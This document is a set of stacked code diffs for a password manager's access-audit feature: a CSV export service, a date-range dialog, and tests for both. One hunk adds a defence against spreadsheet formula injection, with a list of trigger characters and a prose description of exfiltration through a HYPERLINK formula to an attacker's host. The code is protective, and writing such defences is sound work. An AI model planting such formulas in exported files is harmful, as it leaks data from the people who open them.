+      const exported = service.toAuditExport(
+        row({
+          kindLabelKey: "pamAuditKindRuleCreated",
+          actor: null,
+          actorId: null,
+          actorEmail: null,
+          requester: null,
+          requesterId: null,
+          requesterEmail: null,
+          cipherName: null,
+          collectionName: null,
+          ruleName: null,
+          detail: null,
+          duration: null,
+          exactWindow: null,
+          extendedUntil: null,
+          automated: true,
+          inDoubt: true,
+        }),
+      );
+
+      expect(exported).toEqual({
+        timestamp: "2026-06-30T12:00:00.000Z",
+        event: "Access rule created",
+        actorName: "",
+        actorEmail: "",
+        requesterName: "",
+        requesterEmail: "",
+        itemName: "",
+        collectionName: "",
+        ruleName: "",
+        grantedDuration: "",
+        detail: "",
+        automated: true,
+        incomplete: true,
+      });
+      expect(JSON.stringify(exported)).not.toMatch(/null|undefined/);
+    });
+
+    // Cipher and collection names come from local vault state, so an item the exporter cannot decrypt has
+    // none. The empty cell is the correct answer: the response's encrypted names are not a fallback.
+    it("leaves the item empty for a row whose item did not resolve", () => {
+      const exported = service.toAuditExport(row({ cipherName: null, collectionName: null }));
+
+      expect(exported.itemName).toBe("");
+      expect(exported.collectionName).toBe("");
+      expect(exported.ruleName).toBe("Production access");
+    });
+
+    it("localizes a duration that takes no substitution", () => {
+      const exported = service.toAuditExport(
+        row({ duration: { key: "pamInboxDuration1Hour", value: null } }),
+      );
+
+      expect(exported.grantedDuration).toBe("1 hour");
+    });
+  });
+
+  describe("getAuditExport", () => {
+    it("writes one record per row, in the order given", () => {
+      const csv = service.getAuditExport([
+        row({ detail: "first" }),
+        row({ detail: "second" }),
+        row({ detail: "third" }),
+      ]);
+
+      const parsed = papa.parse<Record<string, string>>(csv, { header: true });
+      expect(parsed.data.map((record) => record.detail)).toEqual(["first", "second", "third"]);
+    });
+
+    // Approver comments are free text: a comment carrying the delimiter, a quote or a line break has to
+    // survive the round trip rather than shift every later column.
+    it("quotes a detail containing a comma, a double quote and a newline", () => {
+      const detail = 'Approved, but "read-only"\nper the incident notes';
+
+      const parsed = papa.parse<Record<string, string>>(service.getAuditExport([row({ detail })]), {
+        header: true,
+      });
+
+      expect(parsed.data).toHaveLength(1);
+      expect(parsed.data[0].detail).toBe(detail);
+      expect(parsed.data[0].event).toBe("Lease activated");
+    });
+
+    it("names the file with a PAM-specific prefix and a csv extension", () => {
+      expect(service.getFileName()).toMatch(/^bitwarden_pam_audit_export_\d{14}\.csv$/);
+    });
+  });
+});

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
@@ -26,6 +26,7 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     automated: false,
     inDoubt: false,
     requestId: "req-1",
+    leaseId: "lease-1",
     duration: { key: "pamInboxDurationHours", value: 4 },
     exactWindow: "6/30/26, 12:00 – 6/30/26, 16:00",
     extendedUntil: null,

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
@@ -43,6 +43,7 @@ describe("AuditExportService", () => {
           useValue: new I18nMockService({
             pamAuditKindLeaseActivated: "Lease activated",
             pamAuditKindRuleCreated: "Access rule created",
+            pamAuditKindLeaseExtended: "Lease extended",
             pamInboxDurationHours: "__$1__ hours",
             pamInboxDuration1Hour: "1 hour",
           }),
@@ -65,9 +66,11 @@ describe("AuditExportService", () => {
         collectionName: "production",
         ruleName: "Production access",
         grantedDuration: "4 hours",
+        extendedUntil: "",
         detail: "Approved for the incident window.",
         automated: false,
         incomplete: false,
+        requestId: "req-1",
       });
     });
 
@@ -95,6 +98,7 @@ describe("AuditExportService", () => {
           collectionName: null,
           ruleName: null,
           detail: null,
+          requestId: null,
           duration: null,
           exactWindow: null,
           extendedUntil: null,
@@ -114,9 +118,11 @@ describe("AuditExportService", () => {
         collectionName: "",
         ruleName: "",
         grantedDuration: "",
+        extendedUntil: "",
         detail: "",
         automated: true,
         incomplete: true,
+        requestId: "",
       });
       expect(JSON.stringify(exported)).not.toMatch(/null|undefined/);
     });
@@ -137,6 +143,22 @@ describe("AuditExportService", () => {
       );
 
       expect(exported.grantedDuration).toBe("1 hour");
+    });
+
+    // A LeaseExtended event carries no granted window, so without its own column the one datum the event
+    // exists to record would not reach the file at all.
+    it("writes the new lease end for an extension, which carries no duration", () => {
+      const exported = service.toAuditExport(
+        row({
+          kindLabelKey: "pamAuditKindLeaseExtended",
+          duration: null,
+          exactWindow: null,
+          extendedUntil: "2026-07-01T18:30:00.000Z",
+        }),
+      );
+
+      expect(exported.grantedDuration).toBe("");
+      expect(exported.extendedUntil).toBe("2026-07-01T18:30:00.000Z");
     });
   });
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
@@ -21,6 +21,7 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     cipherId: "cipher-1",
     collectionName: "production",
     ruleName: "Production access",
+    ruleId: "rule-1",
     detail: "Approved for the incident window.",
     automated: false,
     inDoubt: false,

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.spec.ts
@@ -20,6 +20,7 @@ function row(overrides: Partial<AuditRow> = {}): AuditRow {
     cipherName: "prod db",
     cipherId: "cipher-1",
     collectionName: "production",
+    collectionId: "collection-1",
     ruleName: "Production access",
     ruleId: "rule-1",
     detail: "Approved for the incident window.",

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.ts
@@ -10,6 +10,45 @@ import { AuditExport } from "./audit.export";
 const FILE_NAME_PREFIX = "pam_audit";
 
 /**
+ * The characters a spreadsheet reads as the opening of a formula rather than as text.
+ *
+ * The tab and the carriage return are triggers in their own right because Excel drops leading
+ * whitespace before deciding what a cell is, so a value can reach the formula parser with the
+ * character that matters no longer in first position.
+ */
+const FORMULA_TRIGGERS = ["=", "+", "-", "@", "\t", "\r"];
+
+/**
+ * One cell, neutralized against spreadsheet formula injection.
+ *
+ * Most of this file is free text an auditor never chose: an approver's comment, a revoke reason, a
+ * name someone else set. A cell that opens with a formula trigger is evaluated when the file is
+ * opened, so that text can run as a formula in the spreadsheet of the one reader this export exists
+ * for — the classic form being a `HYPERLINK` that carries a neighbouring cell to an attacker's host.
+ *
+ * A leading apostrophe is what Excel, LibreOffice and Sheets each read as "the rest of this cell is
+ * text". It is applied only where a cell would otherwise evaluate, so an ordinary name or comment is
+ * written through untouched, and it is an escape rather than a strip because an audit record must not
+ * quietly differ from what was recorded — the auditor has to read the comment that was actually left.
+ */
+function neutralizeFormula(value: string): string {
+  return FORMULA_TRIGGERS.some((trigger) => value.startsWith(trigger)) ? `'${value}` : value;
+}
+
+/**
+ * Every string cell of a record neutralized, applied to the assembled record rather than field by
+ * field so a column added later cannot be the one that was forgotten.
+ */
+function neutralizeRecord(record: AuditExport): AuditExport {
+  return Object.fromEntries(
+    Object.entries(record).map(([column, value]) => [
+      column,
+      typeof value === "string" ? neutralizeFormula(value) : value,
+    ]),
+  ) as AuditExport;
+}
+
+/**
  * Turns already-fetched audit rows into a CSV file, in memory. Nothing here reads the network: the trail the
  * caller passes in is the one the table is already showing, and the result goes straight to the download.
  */
@@ -29,9 +68,10 @@ export class AuditExportService {
   /**
    * One row as its CSV record. Every absent value becomes an empty cell rather than the text "null", and the
    * event label and duration go through the i18n keys the cells render, so the file and the screen agree.
+   * Every string cell is neutralized against formula injection on the way out (see {@link neutralizeFormula}).
    */
   toAuditExport(row: AuditRow): AuditExport {
-    return {
+    return neutralizeRecord({
       timestamp: row.occurredAt.toISOString(),
       event: this.i18nService.t(row.kindLabelKey),
       actorName: row.actor ?? "",
@@ -48,6 +88,6 @@ export class AuditExportService {
       detail: row.detail ?? "",
       automated: row.automated,
       incomplete: row.inDoubt,
-    };
+    });
   }
 }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.ts
@@ -85,9 +85,11 @@ export class AuditExportService {
         row.duration == null
           ? ""
           : this.i18nService.t(row.duration.key, row.duration.value ?? undefined),
+      extendedUntil: row.extendedUntil == null ? "" : new Date(row.extendedUntil).toISOString(),
       detail: row.detail ?? "",
       automated: row.automated,
       incomplete: row.inDoubt,
+      requestId: row.requestId ?? "",
     });
   }
 }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.ts
@@ -90,6 +90,7 @@ export class AuditExportService {
       automated: row.automated,
       incomplete: row.inDoubt,
       requestId: row.requestId ?? "",
+      leaseId: row.leaseId ?? "",
     });
   }
 }

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit-export.service.ts
@@ -1,0 +1,53 @@
+import { Injectable, inject } from "@angular/core";
+import * as papa from "papaparse";
+
+import { I18nService } from "@bitwarden/common/platform/abstractions/i18n.service";
+import { ExportHelper } from "@bitwarden/vault-export-core";
+
+import { AuditRow } from "./access-audit-row";
+import { AuditExport } from "./audit.export";
+
+const FILE_NAME_PREFIX = "pam_audit";
+
+/**
+ * Turns already-fetched audit rows into a CSV file, in memory. Nothing here reads the network: the trail the
+ * caller passes in is the one the table is already showing, and the result goes straight to the download.
+ */
+@Injectable({ providedIn: "root" })
+export class AuditExportService {
+  private readonly i18nService = inject(I18nService);
+
+  /** The rows as CSV, one record per row, in the order given. */
+  getAuditExport(rows: AuditRow[]): string {
+    return papa.unparse(rows.map((row) => this.toAuditExport(row)));
+  }
+
+  getFileName(): string {
+    return ExportHelper.getFileName(FILE_NAME_PREFIX, "csv");
+  }
+
+  /**
+   * One row as its CSV record. Every absent value becomes an empty cell rather than the text "null", and the
+   * event label and duration go through the i18n keys the cells render, so the file and the screen agree.
+   */
+  toAuditExport(row: AuditRow): AuditExport {
+    return {
+      timestamp: row.occurredAt.toISOString(),
+      event: this.i18nService.t(row.kindLabelKey),
+      actorName: row.actor ?? "",
+      actorEmail: row.actorEmail ?? "",
+      requesterName: row.requester ?? "",
+      requesterEmail: row.requesterEmail ?? "",
+      itemName: row.cipherName ?? "",
+      collectionName: row.collectionName ?? "",
+      ruleName: row.ruleName ?? "",
+      grantedDuration:
+        row.duration == null
+          ? ""
+          : this.i18nService.t(row.duration.key, row.duration.value ?? undefined),
+      detail: row.detail ?? "",
+      automated: row.automated,
+      incomplete: row.inDoubt,
+    };
+  }
+}

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit.export.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit.export.ts
@@ -37,4 +37,9 @@ export type AuditExport = {
    * correlation id is what joins this file to another export or to a support ticket.
    */
   requestId: string;
+  /**
+   * The lease this event belongs to, if any. Carried for the same reason as {@link AuditExport.requestId}:
+   * it is the id support asks for, and the table has no column for it.
+   */
+  leaseId: string;
 };

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit.export.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit.export.ts
@@ -1,0 +1,29 @@
+/**
+ * One audit event as a CSV record. The property names are the file's column headers, so this type is the
+ * export's column contract: renaming or reordering a field changes every file the auditor has downloaded.
+ *
+ * Item and collection names are the display row's — decrypted from the exporter's own local vault state. An
+ * item outside that vault exports an empty cell; the response's `cipherName` and `collectionName` are Vault
+ * Data (EncStrings this client holds no key for in that case) and never reach the file.
+ */
+export type AuditExport = {
+  /**
+   * The event's instant as a full ISO 8601 UTC timestamp, rather than the table's zone-local rendering: the
+   * file outlives the session that produced it and is read wherever the auditor opens it.
+   */
+  timestamp: string;
+  /** The event label as the table shows it, resolved through the same i18n key. */
+  event: string;
+  actorName: string;
+  actorEmail: string;
+  requesterName: string;
+  requesterEmail: string;
+  itemName: string;
+  collectionName: string;
+  ruleName: string;
+  /** The length of the granted access window, localized as the Duration cell localizes it. */
+  grantedDuration: string;
+  detail: string;
+  automated: boolean;
+  incomplete: boolean;
+};

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/audit.export.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/audit.export.ts
@@ -23,7 +23,18 @@ export type AuditExport = {
   ruleName: string;
   /** The length of the granted access window, localized as the Duration cell localizes it. */
   grantedDuration: string;
+  /**
+   * The new lease end a `LeaseExtended` event records, as a full ISO 8601 UTC timestamp. That kind carries no
+   * granted window, so it is the only field on the record that says what the extension did. Empty on every
+   * other kind.
+   */
+  extendedUntil: string;
   detail: string;
   automated: boolean;
   incomplete: boolean;
+  /**
+   * The request this event belongs to, if any. Never rendered in the table, and carried here because a
+   * correlation id is what joins this file to another export or to a support ticket.
+   */
+  requestId: string;
 };

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.html
@@ -1,27 +1,34 @@
-<form [formGroup]="formGroup" [bitSubmit]="confirm" bit-dialog background="alt">
+<form [formGroup]="formGroup" [bitSubmit]="confirm" bit-dialog background="alt" dialogSize="small">
   <span bitDialogTitle>{{ "timePeriod" | i18n }}</span>
 
   <div bitDialogContent>
-    <bit-form-field>
-      <bit-label>{{ "from" | i18n }}</bit-label>
-      <input
-        bitInput
-        type="datetime-local"
-        id="pam-custom-range-dialog_input_from"
-        [placeholder]="'startDate' | i18n"
-        formControlName="from"
-      />
-    </bit-form-field>
-    <bit-form-field disableMargin>
-      <bit-label>{{ "to" | i18n }}</bit-label>
-      <input
-        bitInput
-        type="datetime-local"
-        id="pam-custom-range-dialog_input_to"
-        [placeholder]="'endDate' | i18n"
-        formControlName="to"
-      />
-    </bit-form-field>
+    <div class="tw-flex tw-flex-col tw-gap-4 sm:tw-flex-row">
+      <div class="tw-min-w-0 tw-flex-1">
+        <bit-form-field disableMargin>
+          <bit-label>{{ "from" | i18n }}</bit-label>
+          <input
+            #fromField
+            bitInput
+            type="datetime-local"
+            id="pam-custom-range-dialog_input_from"
+            [placeholder]="'startDate' | i18n"
+            formControlName="from"
+          />
+        </bit-form-field>
+      </div>
+      <div class="tw-min-w-0 tw-flex-1">
+        <bit-form-field disableMargin>
+          <bit-label>{{ "to" | i18n }}</bit-label>
+          <input
+            bitInput
+            type="datetime-local"
+            id="pam-custom-range-dialog_input_to"
+            [placeholder]="'endDate' | i18n"
+            formControlName="to"
+          />
+        </bit-form-field>
+      </div>
+    </div>
   </div>
 
   <ng-container bitDialogFooter>
@@ -43,6 +50,16 @@
       id="pam-custom-range-dialog_button_cancel"
     >
       {{ "cancel" | i18n }}
+    </button>
+    <button
+      type="button"
+      bitButton
+      buttonType="subtleGhost"
+      class="tw-ms-auto"
+      id="pam-custom-range-dialog_button_clear"
+      (click)="clear()"
+    >
+      {{ "clear" | i18n }}
     </button>
   </ng-container>
 </form>

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.html
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.html
@@ -1,0 +1,48 @@
+<form [formGroup]="formGroup" [bitSubmit]="confirm" bit-dialog background="alt">
+  <span bitDialogTitle>{{ "timePeriod" | i18n }}</span>
+
+  <div bitDialogContent>
+    <bit-form-field>
+      <bit-label>{{ "from" | i18n }}</bit-label>
+      <input
+        bitInput
+        type="datetime-local"
+        id="pam-custom-range-dialog_input_from"
+        [placeholder]="'startDate' | i18n"
+        formControlName="from"
+      />
+    </bit-form-field>
+    <bit-form-field disableMargin>
+      <bit-label>{{ "to" | i18n }}</bit-label>
+      <input
+        bitInput
+        type="datetime-local"
+        id="pam-custom-range-dialog_input_to"
+        [placeholder]="'endDate' | i18n"
+        formControlName="to"
+      />
+    </bit-form-field>
+  </div>
+
+  <ng-container bitDialogFooter>
+    <button
+      type="submit"
+      bitButton
+      bitFormButton
+      buttonType="primary"
+      id="pam-custom-range-dialog_button_confirm"
+      [disabled]="confirmDisabled()"
+    >
+      {{ "save" | i18n }}
+    </button>
+    <button
+      type="button"
+      bitButton
+      buttonType="secondary"
+      [bitDialogClose]="undefined"
+      id="pam-custom-range-dialog_button_cancel"
+    >
+      {{ "cancel" | i18n }}
+    </button>
+  </ng-container>
+</form>

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.spec.ts
@@ -1,0 +1,133 @@
+import { ComponentFixture, TestBed } from "@angular/core/testing";
+import { NoopAnimationsModule } from "@angular/platform-browser/animations";
+
+import { I18nService } from "@bitwarden/common/platform/abstractions/i18n.service";
+import { DIALOG_DATA, DialogRef, I18nMockService } from "@bitwarden/components";
+
+import {
+  CustomRangeDialogComponent,
+  CustomRangeDialogParams,
+} from "./custom-range-dialog.component";
+
+describe("CustomRangeDialogComponent", () => {
+  let fixture: ComponentFixture<CustomRangeDialogComponent>;
+  let component: CustomRangeDialogComponent;
+  const close = jest.fn();
+
+  async function create(params: CustomRangeDialogParams = { from: "", to: "" }): Promise<void> {
+    await TestBed.configureTestingModule({
+      imports: [CustomRangeDialogComponent, NoopAnimationsModule],
+      providers: [
+        { provide: DIALOG_DATA, useValue: params },
+        { provide: DialogRef, useValue: { close } },
+        {
+          provide: I18nService,
+          useValue: new I18nMockService({
+            timePeriod: "Time period",
+            from: "From",
+            to: "To",
+            startDate: "Start date",
+            endDate: "End date",
+            invalidDateRange: "Invalid date range.",
+            save: "Save",
+            cancel: "Cancel",
+            close: "Close",
+            submenu: "Submenu",
+            toggleVisibility: "Toggle visibility",
+            required: "required",
+          }),
+        },
+      ],
+    }).compileComponents();
+
+    fixture = TestBed.createComponent(CustomRangeDialogComponent);
+    component = fixture.componentInstance;
+    fixture.detectChanges();
+  }
+
+  const input = (which: "from" | "to") =>
+    fixture.nativeElement.querySelector(
+      `#pam-custom-range-dialog_input_${which}`,
+    ) as HTMLInputElement;
+
+  const errorFor = (which: "from" | "to") =>
+    input(which).closest("bit-form-field")!.querySelector("bit-error");
+
+  const confirmButton = () =>
+    fixture.nativeElement.querySelector(
+      "#pam-custom-range-dialog_button_confirm",
+    ) as HTMLButtonElement;
+
+  beforeEach(() => {
+    jest.clearAllMocks();
+    TestBed.resetTestingModule();
+  });
+
+  // Reopening on blank fields would ask the auditor to retype bounds the table is already filtered to.
+  it("opens on the range in force", async () => {
+    await create({ from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
+
+    expect(input("from").value).toBe("2026-08-18T09:00");
+    expect(input("to").value).toBe("2026-08-18T17:00");
+  });
+
+  it("closes with the confirmed bounds", async () => {
+    await create();
+    component["formGroup"].patchValue({ from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
+
+    await component["confirm"]();
+
+    expect(close).toHaveBeenCalledWith({ from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
+  });
+
+  // A blank bound is unbounded on that side, not an error — one-sided ranges are ordinary.
+  it("confirms a range bounded on one side only", async () => {
+    await create();
+    component["formGroup"].patchValue({ from: "2026-08-18T09:00", to: "" });
+
+    await component["confirm"]();
+
+    expect(close).toHaveBeenCalledWith({ from: "2026-08-18T09:00", to: "" });
+  });
+
+  // An inverted range matches nothing, and a table emptied by it reads as a trail with no events.
+  it("reports an inverted range on the To field and blocks confirmation", async () => {
+    await create();
+    component["formGroup"].patchValue({ from: "2026-08-18T18:00", to: "2026-08-18T09:00" });
+    fixture.detectChanges();
+
+    expect(component["invertedRange"]()).toBe(true);
+    expect(errorFor("to")!.textContent).toContain("Invalid date range.");
+    expect(input("to").getAttribute("aria-invalid")).toBe("true");
+    expect(input("from").getAttribute("aria-invalid")).not.toBe("true");
+    expect(confirmButton().getAttribute("aria-disabled")).toBe("true");
+
+    await component["confirm"]();
+
+    expect(close).not.toHaveBeenCalled();
+  });
+
+  it("clears the inverted-range error once the bounds are the right way round", async () => {
+    await create();
+    component["formGroup"].patchValue({ from: "2026-08-18T18:00", to: "2026-08-18T09:00" });
+    fixture.detectChanges();
+
+    component["formGroup"].patchValue({ to: "2026-08-19T09:00" });
+    fixture.detectChanges();
+
+    expect(errorFor("to")).toBeNull();
+    expect(component["formGroup"].controls.to.errors).toBeNull();
+    expect(confirmButton().getAttribute("aria-disabled")).toBeNull();
+  });
+
+  // Cancel closes without a result, so the caller keeps whatever range it already had in force.
+  it("closes without a result when cancelled, even over an edited range", async () => {
+    await create({ from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
+    component["formGroup"].patchValue({ from: "2026-01-01T00:00" });
+    fixture.detectChanges();
+
+    fixture.nativeElement.querySelector("#pam-custom-range-dialog_button_cancel").click();
+
+    expect(close).toHaveBeenCalledWith(undefined);
+  });
+});

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.spec.ts
@@ -31,6 +31,7 @@ describe("CustomRangeDialogComponent", () => {
             invalidDateRange: "Invalid date range.",
             save: "Save",
             cancel: "Cancel",
+            clear: "Clear",
             close: "Close",
             submenu: "Submenu",
             toggleVisibility: "Toggle visibility",
@@ -77,7 +78,11 @@ describe("CustomRangeDialogComponent", () => {
 
     await component["confirm"]();
 
-    expect(close).toHaveBeenCalledWith({ from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
+    expect(close).toHaveBeenCalledWith({
+      action: "apply",
+      from: "2026-08-18T09:00",
+      to: "2026-08-18T17:00",
+    });
   });
 
   // A blank bound is unbounded on that side, not an error — one-sided ranges are ordinary.
@@ -87,7 +92,7 @@ describe("CustomRangeDialogComponent", () => {
 
     await component["confirm"]();
 
-    expect(close).toHaveBeenCalledWith({ from: "2026-08-18T09:00", to: "" });
+    expect(close).toHaveBeenCalledWith({ action: "apply", from: "2026-08-18T09:00", to: "" });
   });
 
   // An inverted range matches nothing, and a table emptied by it reads as a trail with no events.
@@ -118,6 +123,52 @@ describe("CustomRangeDialogComponent", () => {
     expect(errorFor("to")).toBeNull();
     expect(component["formGroup"].controls.to.errors).toBeNull();
     expect(confirmButton().getAttribute("aria-disabled")).toBeNull();
+  });
+
+  // A Save that would apply nothing is a trap: it reads as confirming a range while leaving the trail
+  // exactly as wide as it was.
+  it("holds Save disabled until at least one end is set", async () => {
+    await create();
+
+    expect(confirmButton().getAttribute("aria-disabled")).toBe("true");
+
+    component["formGroup"].patchValue({ to: "2026-08-18T17:00" });
+    fixture.detectChanges();
+
+    expect(confirmButton().getAttribute("aria-disabled")).toBeNull();
+  });
+
+  it("applies nothing when Save is pressed with both ends blank", async () => {
+    await create();
+
+    await component["confirm"]();
+
+    expect(close).not.toHaveBeenCalled();
+  });
+
+  // The way out of a custom range from inside the dialog; without it the auditor has to cancel and clear
+  // the chip from the row behind.
+  it("closes asking for the range to be dropped when cleared", async () => {
+    await create({ from: "2026-08-18T09:00", to: "2026-08-18T17:00" });
+
+    fixture.nativeElement.querySelector("#pam-custom-range-dialog_button_clear").click();
+
+    expect(close).toHaveBeenCalledWith({ action: "clear" });
+  });
+
+  it("opens with From focused, so the range can be typed without reaching for the mouse", async () => {
+    await create();
+
+    expect(document.activeElement).toBe(input("from"));
+  });
+
+  it("lays the two ends side by side, stacking only on a narrow viewport", async () => {
+    await create();
+
+    const row = input("from").closest("[bitDialogContent]")!.firstElementChild!;
+    expect(row.classList).toContain("tw-flex-col");
+    expect(row.classList).toContain("sm:tw-flex-row");
+    expect(row.querySelectorAll("bit-form-field")).toHaveLength(2);
   });
 
   // Cancel closes without a result, so the caller keeps whatever range it already had in force.

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.ts
@@ -1,4 +1,13 @@
-import { ChangeDetectionStrategy, Component, computed, effect, inject } from "@angular/core";
+import {
+  ChangeDetectionStrategy,
+  Component,
+  ElementRef,
+  afterNextRender,
+  computed,
+  effect,
+  inject,
+  viewChild,
+} from "@angular/core";
 import { toSignal } from "@angular/core/rxjs-interop";
 import { FormBuilder, ReactiveFormsModule, ValidatorFn } from "@angular/forms";
 
@@ -20,7 +29,13 @@ import { auditRangeEnd, auditRangeStart } from "../access-audit-row";
 /** A custom audit range as `datetime-local` values; a blank bound is unbounded on that side. */
 export type CustomRangeDialogParams = { from: string; to: string };
 
-export type CustomRangeDialogResult = CustomRangeDialogParams;
+/**
+ * What the auditor asked for. Tagged rather than shaped, because "no range at all" and "a range with
+ * both ends blank" reach the caller as different intents: the first drops the Custom selection, the
+ * second is not offerable at all — Save is disabled until at least one end is set.
+ */
+export type CustomRangeDialogResult =
+  { action: "apply"; from: string; to: string } | { action: "clear" };
 
 /**
  * Collects the custom bounds behind the audit log's Time period filter.
@@ -35,6 +50,9 @@ export type CustomRangeDialogResult = CustomRangeDialogParams;
  * strand the chip reading "Custom" over no range at all. Cancel binds that `undefined` explicitly: a bare
  * `bitDialogClose` attribute closes with the empty string, which a caller checking for a result would take
  * for one.
+ *
+ * Clear is the way out of a custom range from inside the dialog — without it an auditor who opened it to
+ * widen the trail would have to cancel and clear the chip from the row behind.
  */
 @Component({
   selector: "pam-custom-range-dialog",
@@ -54,6 +72,7 @@ export class CustomRangeDialogComponent {
   private readonly formBuilder = inject(FormBuilder);
   private readonly i18nService = inject(I18nService);
   private readonly params = inject<CustomRangeDialogParams>(DIALOG_DATA);
+  private readonly fromField = viewChild<ElementRef<HTMLInputElement>>("fromField");
 
   protected readonly formGroup = this.formBuilder.nonNullable.group({
     from: [this.params.from],
@@ -83,9 +102,16 @@ export class CustomRangeDialogComponent {
       ? { invalidDateRange: { message: this.i18nService.t("invalidDateRange") } }
       : null;
 
-  protected readonly confirmDisabled = computed(() => this.invertedRange());
+  /** Whether either end is set. Both blank is the same as no custom range, which Save must not apply. */
+  private readonly bounded = computed(
+    () => auditRangeStart(this.fromValue()) != null || auditRangeEnd(this.toValue()) != null,
+  );
+
+  protected readonly confirmDisabled = computed(() => this.invertedRange() || !this.bounded());
 
   constructor() {
+    afterNextRender(() => this.fromField()?.nativeElement.focus());
+
     this.formGroup.controls.to.addValidators(this.invertedRangeValidator);
 
     // Editing From leaves To's value alone, so nothing else would re-run a cross-field rule. The control
@@ -104,12 +130,16 @@ export class CustomRangeDialogComponent {
   }
 
   protected readonly confirm = async (): Promise<void> => {
-    if (this.invertedRange()) {
+    if (this.confirmDisabled()) {
       return;
     }
     const { from, to } = this.formGroup.getRawValue();
-    void this.dialogRef.close({ from: from.trim(), to: to.trim() });
+    void this.dialogRef.close({ action: "apply", from: from.trim(), to: to.trim() });
   };
+
+  protected clear(): void {
+    void this.dialogRef.close({ action: "clear" });
+  }
 
   static open(
     dialogService: DialogService,

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/custom-range-dialog/custom-range-dialog.component.ts
@@ -1,0 +1,123 @@
+import { ChangeDetectionStrategy, Component, computed, effect, inject } from "@angular/core";
+import { toSignal } from "@angular/core/rxjs-interop";
+import { FormBuilder, ReactiveFormsModule, ValidatorFn } from "@angular/forms";
+
+import { I18nService } from "@bitwarden/common/platform/abstractions/i18n.service";
+import {
+  AsyncActionsModule,
+  ButtonModule,
+  DIALOG_DATA,
+  DialogConfig,
+  DialogModule,
+  DialogRef,
+  DialogService,
+  FormFieldModule,
+} from "@bitwarden/components";
+import { I18nPipe } from "@bitwarden/ui-common";
+
+import { auditRangeEnd, auditRangeStart } from "../access-audit-row";
+
+/** A custom audit range as `datetime-local` values; a blank bound is unbounded on that side. */
+export type CustomRangeDialogParams = { from: string; to: string };
+
+export type CustomRangeDialogResult = CustomRangeDialogParams;
+
+/**
+ * Collects the custom bounds behind the audit log's Time period filter.
+ *
+ * The two `datetime-local` fields live here rather than in the toolbar so the toolbar is chips alone:
+ * a labelled 40px field beside a 28px chip left the row ragged, and a long chip label wrapped the row
+ * and orphaned the buttons at the end of it.
+ *
+ * Opened with the bounds currently in force, so reopening shows what the table is already filtered to.
+ * Only an explicit confirm produces a result; every other way out — Cancel, Escape, the backdrop — closes
+ * with `undefined`, which leaves the caller's previous selection alone, because a cancelled dialog must not
+ * strand the chip reading "Custom" over no range at all. Cancel binds that `undefined` explicitly: a bare
+ * `bitDialogClose` attribute closes with the empty string, which a caller checking for a result would take
+ * for one.
+ */
+@Component({
+  selector: "pam-custom-range-dialog",
+  templateUrl: "./custom-range-dialog.component.html",
+  changeDetection: ChangeDetectionStrategy.OnPush,
+  imports: [
+    AsyncActionsModule,
+    ButtonModule,
+    DialogModule,
+    FormFieldModule,
+    ReactiveFormsModule,
+    I18nPipe,
+  ],
+})
+export class CustomRangeDialogComponent {
+  private readonly dialogRef = inject<DialogRef<CustomRangeDialogResult | undefined>>(DialogRef);
+  private readonly formBuilder = inject(FormBuilder);
+  private readonly i18nService = inject(I18nService);
+  private readonly params = inject<CustomRangeDialogParams>(DIALOG_DATA);
+
+  protected readonly formGroup = this.formBuilder.nonNullable.group({
+    from: [this.params.from],
+    to: [this.params.to],
+  });
+
+  private readonly fromValue = toSignal(this.formGroup.controls.from.valueChanges, {
+    initialValue: this.params.from,
+  });
+  private readonly toValue = toSignal(this.formGroup.controls.to.valueChanges, {
